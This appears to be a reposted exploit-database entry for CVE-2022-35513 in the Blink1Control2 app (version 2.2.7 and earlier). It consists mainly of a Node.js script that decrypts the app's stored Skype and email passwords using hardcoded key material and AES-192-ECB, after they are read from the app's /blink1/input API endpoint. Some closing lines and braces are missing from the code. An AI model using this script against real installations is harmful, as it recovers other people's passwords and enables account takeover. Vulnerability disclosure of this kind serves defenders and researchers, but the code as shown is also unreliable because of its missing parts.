Blink1Control2 2.2.7 – Weak Password Encryption

  • 作者: p1ckzi
    日期: 2022-09-20
  • 类别:
  • 来源:
  • // Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption
    // Date: 2022-08-12
    // Exploit Author: p1ckzi
    // Vendor Homepage:
    // Software Link:
    // Vulnerable Version: blink1control2 <= 2.2.7
    // Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.
    // CVE: CVE-2022-35513
    // Description:
    // the blink1control2 app (versions <= 2.2.7) utilises an insecure method
    // of password storage which can be found by accessing the /blink1/input url
    // of the api server.
    // password ciphertext for skype logins and email are listed
    // and can be decrypted. example usage:
    // node blink1-pass-decrypt <ciphertext>
    #!/usr/bin/env node
    const {ArgumentParser} = require('argparse');
    const simpleCrypt = require('simplecrypt');
    function exploit() {
    const BANNER = '\033[36m\n\
     _ _ _ __\n\
    | |__ | (_)_ __ | | _/ |_ __ __ _ ___ ___\n\
    | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\
    | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\
    |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\
    __| | ______ _ __ _ _ _ __ | |_\n\
     / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\
    | (_| |__| (__| || |_| | |_) | |_\n\
     \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\
    const PARSER = new ArgumentParser({
    description: 'decrypts passwords found at the /blink/input url '
    + 'of the blink1control2 api server (version <= 2.2.7 ).'
    PARSER.add_argument('ciphertext', {
    help: 'encrypted password string to use', type: 'str'
    let args = PARSER.parse_args();
    // supplied ciphertext is decrypted with same salt, password, and method
    // used for encryption:
    try {
    let crypt = simpleCrypt({
    salt: 'boopdeeboop',
    password: 'blink1control',
    method: 'aes-192-ecb'
    let ciphertext = args.ciphertext;
    let decrypted = crypt.decrypt(ciphertext);
    console.log('\033[32m[+] decrypted password:\033[39m');
    catch (TypeError) {
    console.log('\033[33m[!] the submitted hash was invalid.\033[39m');
    finally {